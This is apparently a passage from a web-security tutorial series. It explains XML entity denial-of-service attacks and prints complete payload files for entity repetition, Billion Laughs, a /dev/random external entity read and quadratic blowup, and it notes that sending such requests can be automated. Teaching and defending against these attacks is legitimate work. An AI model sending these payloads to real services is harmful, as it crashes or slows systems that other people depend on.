<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY msg "Hello world"> ]> <book> <name>&msg;</name> <author>Nobody</author> <price>0000</price> </book>Output :
Now if we modified the XML entity like this :
poc.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY msg "Hello world "> <!ENTITY msg1 "&msg;&msg;&msg;&msg;&msg;&msg;&msg;&msg;"> ]> <book> <name>&msg1;</name> <author>Nobody</author> <price>0000</price> </book>Then we repeat the message again and again.
Output :
XML Billion Laughs :
In Billion laugh attack the xml entity with value "lol" is declared repeatedly with entities 10's of times of more than that, which forces the xml parser to allocate the memory of every single entity reference. As the result of this, the huge amount of memory is wasted, which causing the server to crash. But nowadays this kind of attack is detected by the xml parsers and it immediately stop the parsing of document. The example of this attack is :
bl.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;"> ]> <book> <name>&lol10;</name> <author>Nobody</author> <price>0000</price> </book>Output :
As we can see it can be detected by xml parser. Also note that use can use anything in the place of "lol".
"/dev/random" method :
This is another method to perform DOS attack through XML entities. At here the xml parser is forced to read the /dev/random file.
dos.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY dos SYSTEM "file:///dev/random"> ]> <book> <name>&dos;</name> <author>Nobody</author> <price>0000</price> </book>Output :
As we can see at the above figure, By sending the above payload multiple times, we cause the server to slow down and when we try to load the page than it will not loaded.
XML Quadratic Blowup :
The quadratic Blowup attack is based on the Billion laughs attack, but without using recursive entity reference like Billion Laughs. In quadratic blowup attack, first an entity with vary large value is declared and then it is referenced thousand times within an xml document, which causes the server to slow down or sometimes crash.
qbl.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE book [ <!ENTITY dos "DOSDOSDOSDOSDOSD.....OSDOSDOSDOSDOSDOS"> <1000...iterations of 'DOS'> ]> <book> <name>&dos;&dos;&dos;......&dos;&dos;&dos</name> <1000...iterations of '&dos;'> <author>Nobody</author> <price>0000</price> </book>The above xml document declare an entity dos with value "DOS.. ...(1000 times)" and it is referenced 1000 times in the document. The process of sending these kind of crafted requests are simply automated by python libraries like requests.
Codes used above can be downloaded form here : Github_link
XML Attacks Part 1 : Basic of XML structure and attack surface
XML Attacks Part 2 : XXE (Xml eXternal Entity ) Attack
XML Attacks Part 4 : Out Of Bound Attacks
Visit the link for more tutorials about Web Security : http://www.sec-art.net/p/web-security.html